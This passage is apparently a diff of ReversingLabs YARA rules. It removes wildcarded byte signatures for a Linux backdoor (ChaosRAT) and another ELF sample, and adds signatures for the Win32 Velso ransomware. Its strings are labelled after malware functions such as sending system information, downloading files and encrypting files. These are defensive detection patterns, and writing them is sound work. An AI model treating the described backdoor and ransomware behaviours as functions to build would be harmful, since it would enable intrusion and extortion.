+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8
+            ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ?? B8
         }
-		$decrypt_configuration_p3 = {
-            41 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C1 C6 44 04 ?? ?? 83 C1 ?? 48 63 C9 C6 44 0C
-            ?? ?? 4C 89 EB BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 49 C7
-            C4 ?? ?? ?? ?? 4C 8D 74 24 ?? 41 BF ?? ?? ?? ?? EB ?? 0F B6 03 3C ?? 75 ?? 8B 7C 24
-            ?? 48 8D 54 24 ?? 48 8D 3C 3A BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24
-            ?? 48 81 C2 ?? ?? ?? ?? 48 8B 4C 24 ?? 66 89 44 91 ?? 0F B7 44 24 ?? 66 89 44 91 ??
-            83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ??
-            ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 44 24 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 E1
-            4C 89 F7 44 89 F8 F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82 ?? ??
-            ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? C7 80 ?? ??
-            ?? ?? ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C7 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 C0 BA ?? ?? ?? ?? 0F 4E C2 48 8B 54 24 ?? 89 82 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            EB ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+		$encrypt_files_p2 = {
+            E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8
+            ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8D 45
+            ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 83 BD ?? ?? ?? ??
+            ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8D 45 ??
+            E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B 08 FF 51 ?? 83
+            BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? E8 ?? ?? ?? ??
+            8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9
+            ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ?? ?? ?? 59 EB ??
+            55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B
+            18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 B3 ?? 8D 45 ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 8D 95 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B
+            F8 57 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 33 C0 5A 59 59
+            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
         }
-		$encrypt_and_send_data = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74 24 ?? 4C 89 7C
-            24 ?? 48 83 EC ?? 41 89 FC 48 89 F5 49 89 D6 41 89 CD 48 85 F6 0F 84 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89 03
-            0F B6 45 ?? 88 43 ?? 8B 6B ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? BA ??
-            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 BA ?? ?? ?? ?? 48 89 DE 44
-            89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? 48
-            89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 ED 74
-            ?? 4D 85 F6 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 4C 63 FD 4C 89 FF E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 74 ?? 4C 89 FA 4C 89
-            F6 48 89 C7 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 EE 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 89
-            EA 48 89 DE 44 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8
-            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 48 8B 3D ?? ?? ?? ?? 48 83
-            C7 ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 48
-            8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 4C 8B 7C 24
-            ?? 48 83 C4 ?? C3
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74
+            ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
+            ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ??
+            ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84
+            ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6
+            03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03
+            C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3
+            48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
         }
-		$receive_and_decrypt_data = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 83 EC ?? 41 89 FC 48
-            89 F3 49 89 D5 89 CD 48 85 F6 74 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ??
-            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 8B 53 ?? 85 D2 74 ?? 4D 85 ED 75 ??
-            B8 ?? ?? ?? ?? EB ?? 81 FA ?? ?? ?? ?? 77 ?? 89 E9 4C 89 EE 44 89 E7 E8 ?? ?? ?? ??
-            85 C0 74 ?? 8B 73 ?? BA ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8
-            ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ??
-            C3
+		$enum_resources = {
+            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 55 ?? 33 D2 55 68 ?? ?? ?? ??
+            64 FF 32 64 89 22 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 ?? 52 50 6A ?? 6A
+            ?? 6A ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 33 C0 5A 59 59 64 89 10 E9 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 89
+            45 ?? 8D 45 ?? 50 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D
+            ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 85 C0 0F 82 ?? ?? ?? ?? 40 89 45 ?? 8B 45 ?? 8B
+            58 ?? 85 DB 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B
+            D3 E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 12 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? E8
+            ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 52 ?? 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? B1 ??
+            E8 ?? ?? ?? ?? 8D 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 55 ?? B8 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 55 ?? 8B
+            08 FF 51 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? F7
+            40 ?? ?? ?? ?? ?? 76 ?? 8B 45 ?? E8 ?? ?? ?? ?? 83 45 ?? ?? FF 4D ?? 0F 85 ?? ?? ??
+            ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8
+            ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0
+            5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( all of ( $change_name_on_system_p* ) ) and ( all of ( $decrypt_configuration_p* ) ) and ( $encrypt_and_send_data ) and ( $receive_and_decrypt_data ) )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-rule REVERSINGLABS_Linux_Backdoor_Chaosrat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Velso : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects ChaosRAT backdoor."
+		description = "Yara rule that detects Velso ransomware."
 		author = "ReversingLabs"
-		id = "efb8c631-79bf-5d18-ae99-0e55ea462278"
-		date = "2025-06-30"
-		modified = "2025-06-30"
+		id = "72c7baaa-4f83-54c5-ba71-2b45e5eeefd2"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.ChaosRAT.yara#L1-L270"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Velso.yara#L1-L230"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "09a11559384f3e01c8ac304d933a8279175c676fba9ec70627f44b76e90090f9"
+		logic_hash = "602be848a26106a1bd46cfc515578f0628687e6cb352e609a274220a61bcb620"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "ChaosRAT"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Velso"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$network_communication_v1 = {
-            49 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 83 EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 89 44 24
-            ?? 80 78 ?? ?? 74 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? E8
-            ?? ?? ?? ?? 0F 1F 40 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 48 ?? 48 89 D8 FF D1 44 0F
-            11 7C 24 ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 DE 31 C0 48 8D 1D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 90 48 8B 1D ??
-            ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 89 FE 48 8D 4C 24 ?? E8 ?? ?? ?? ??
-            48 8B 4C 24 ?? C6 41 ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 0F 1F 44 00 ?? E8 ?? ?? ??
-            ?? 48 8B 44 24 ?? E9 ?? ?? ?? ?? 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B
-            44 24 ?? C6 40 ?? ?? E9 ?? ?? ?? ?? 48 8B 48 ?? 48 89 D8 FF D1 44 0F 11 7C 24 ?? B9
-            ?? ?? ?? ?? 48 89 C7 48 89 DE 31 C0 48 8D 1D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 90 48 8B 1D ?? ?? ?? ?? 48 8D
-            05 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 89 FE 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ??
-            C6 41 ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 66 90 E8 ?? ?? ?? ?? 48 8B 44 24 ?? E9 ??
-            ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24
-        }
-		$send_system_information_v1 = {
-            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
-            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 11 48 8B 49
-            ?? 48 8B 52 ?? 48 89 C8 FF D2 48 85 DB 0F 85 ?? ?? ?? ?? 48 89 C3 48 8D 05 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 85 FF 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89
-            5C 24 ?? 48 89 4C 24 ?? 44 0F 11 7C 24 ?? 44 0F 11 7C 24 ?? 48 8B 8C 24 ?? ?? ?? ??
-            48 8B 51 ?? 48 8B 42 ?? 48 8B 5A ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24
-            ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D
-            44 24 ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 51 ??
-            48 8B 49 ?? 48 8B 52 ?? 48 89 C7 48 89 DE 4C 8B 44 24 ?? 4C 8B 4C 24 ?? 4C 8B 54 24
-            ?? 48 89 C8 48 8D 1D ?? ?? ?? ?? B9 ?? ?? ?? ?? FF D2 48 85 DB 75 ?? 48 81 78 ?? ??
-            ?? ?? ?? 74 ?? 44 0F 11 7C 24 ?? 48 8B 40 ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48
-            89 4C 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C 24 ?? BF ??
-            ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 31
-            C0 31 DB 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 D8 48 89 CB 48 8B AC
-            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 F8 48 89 F3 48 8B AC 24 ?? ?? ?? ?? 48
-            81 C4 ?? ?? ?? ?? C3 48 89 D8 48 89 CB 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
-            C3 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24
+		$find_files_p1 = {
+            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 A5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 89 04 24 E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? C9 C3 C7 04 24 ?? ?? ?? ?? 8B 4D ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ??
+            ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ??
+            ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ??
+            85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ??
+            C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ??
+            E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ??
+            ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ??
+            ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 4D ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89
+            04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ??
+            89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24
         }
-		$download_file_v1_p1 = {
-            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
-            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89
-            8C 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 B4 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48
-            89 5C 24 ?? 48 89 4C 24 ?? 48 89 F8 48 89 F3 E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C
-            24 ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 51
-            ?? 48 8B 49 ?? 48 89 D0 48 89 CB E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ??
-            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89
-            94 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 44
-            0F 11 7C 24 ?? 44 0F 11 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89
-            4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8D
-            0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
-            BB ?? ?? ?? ?? 48 8D 4C 24 ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 8B 4C 24 ??
-            48 8B 49 ?? 48 89 C7 48 89 DE 45 31 C0 45 31 C9 4D 89 CA 48 8B 44 24 ?? 48 8D 1D ??
-            ?? ?? ?? 48 89 CA B9 ?? ?? ?? ?? FF D2 0F 1F 80 ?? ?? ?? ?? 48 85 DB 0F 85 ?? ?? ??
-            ?? 48 81 78 ?? ?? ?? ?? ?? 75 ?? 48 8B 08 48 8B 78 ?? 48 8B 70 ?? 48 8B 84 24 ?? ??
-            ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 74 ?? 31 C9
+		$find_files_p2 = {
+            8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52 52 8D 95
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ??
+            EB ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 52 52 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 51 51 74 ??
+            8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 74 ??
+            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 89 85 ?? ?? ?? ??
+            8B 45 ?? 8B 51 ?? 8D 8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 51 89 44 24 ?? 8B 45 ?? 89 44 24
+            ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04
+            24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04
+            24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ??
+            8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89
+            44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+            ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 87 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8
         }
-		$download_file_v1_p2 = {
-            48 89 C7 48 89 DE 31 C0 48 89 CB 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 31
-            C0 48 8B 5C 24 ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 31 FF 31 F6 48 8B AC 24 ?? ?? ?? ??
